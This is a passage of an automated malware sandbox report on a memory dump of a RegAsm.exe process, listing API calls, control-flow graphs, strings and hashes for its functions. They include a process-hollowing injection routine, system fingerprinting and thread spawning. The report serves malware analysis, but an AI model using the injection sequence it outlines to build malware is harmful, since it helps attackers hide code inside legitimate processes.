                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                • API String ID: 4236061018-3687161714
                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                • NtClose.NTDLL(?), ref: 00418332
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                • WriteProcessMemory.KERNEL32 ref: 00418446
                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                • NtClose.NTDLL(?), ref: 004184A3
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                • GetLastError.KERNEL32 ref: 004184B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                • API String ID: 316982871-3035715614
                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1536 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1543 10001177-1000119e lstrlenW FindFirstFileW 1536->1543 1544 10001168-10001172 lstrlenW 1536->1544 1545 100011a0-100011a8 1543->1545 1546 100011e1-100011e9 1543->1546 1544->1543 1547 100011c7-100011d8 FindNextFileW 1545->1547 1548 100011aa-100011c4 call 10001000 1545->1548 1547->1545 1550 100011da-100011db FindClose 1547->1550 1548->1547 1550->1546
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                • String ID:
                                                • API String ID: 1083526818-0
                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1662 411d39-411d59 call 4117d7 1665 411d62-411d6b 1662->1665 1666 411d5b-411d5d 1662->1666 1668 411d7a-411d8c call 4117d7 1665->1668 1669 411d6d-411d78 SetLastError 1665->1669 1667 411f75-411f7b 1666->1667 1668->1666 1672 411d8e-411d99 1668->1672 1669->1666 1672->1669 1673 411d9b-411da4 1672->1673 1673->1669 1674 411da6-411daa 1673->1674 1674->1669 1675 411dac-411db6 1674->1675 1676 411db8-411dbb 1675->1676 1677 411dda-411dfd GetNativeSystemInfo call 4117c6 * 2 1675->1677 1679 411dbd-411dc3 1676->1679 1686 411e0f-411e29 call 411cde 1677->1686 1687 411dff 1677->1687 1681 411dc5-411dc8 1679->1681 1682 411dca 1679->1682 1683 411dcd-411dd8 1681->1683 1682->1683 1683->1677 1683->1679 1693 411e47-411e5c GetProcessHeap HeapAlloc 1686->1693 1694 411e2b-411e41 call 411cde 1686->1694 1688 411e04-411e0a SetLastError 1687->1688 1690 411f72 1688->1690 1692 411f74 1690->1692 1692->1667 1695 411e70-411ebb call 4117d7 1693->1695 1696 411e5e-411e6e call 411cf5 1693->1696 1694->1693 1703 411e43-411e45 1694->1703 1704 411ec1-411f03 call 411cde call 436990 call 4117ea 1695->1704 1705 411f6b-411f6d call 4120b2 1695->1705 1696->1703 1703->1688 1704->1705 1713 411f05-411f0d 1704->1713 1705->1690 1714 411f0f-411f1c call 411aee 1713->1714 1715 411f1e-411f21 1713->1715 1717 411f24-411f2d call 411b9a 1714->1717 1715->1717 1717->1705 1721 411f2f-411f38 call 41198a 1717->1721 1721->1705 1724 411f3a-411f43 call 411abd 1721->1724 1724->1705 1727 411f45-411f4c 1724->1727 1728 411f86 1727->1728 1729 411f4e-411f54 1727->1729 1730 411f8a-411f8c 1728->1730 1731 411f81-411f84 1729->1731 1732 411f56-411f5a call 1000220c 1729->1732 1730->1692 1731->1730 1733 411f5c-411f5e 1732->1733 1734 411f60-411f65 SetLastError 1733->1734 1735 411f7c-411f7f 1733->1735 1734->1705 1735->1730
                                                APIs
                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                • String ID:
                                                • API String ID: 3950776272-0
                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                • String ID: 5.1.1 Pro$override$pth_unenc
                                                • API String ID: 2281282204-2344886030
                                                • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00829328), ref: 004338DA
                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                • String ID:
                                                • API String ID: 1815803762-0
                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                Strings
                                                • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Time$FileSystem
                                                • String ID: GetSystemTimePreciseAsFileTime
                                                • API String ID: 2086374402-595813830
                                                • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Name$ComputerUser
                                                • String ID:
                                                • API String ID: 4229901323-0
                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                • Instruction Fuzzy Hash:
                                                Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 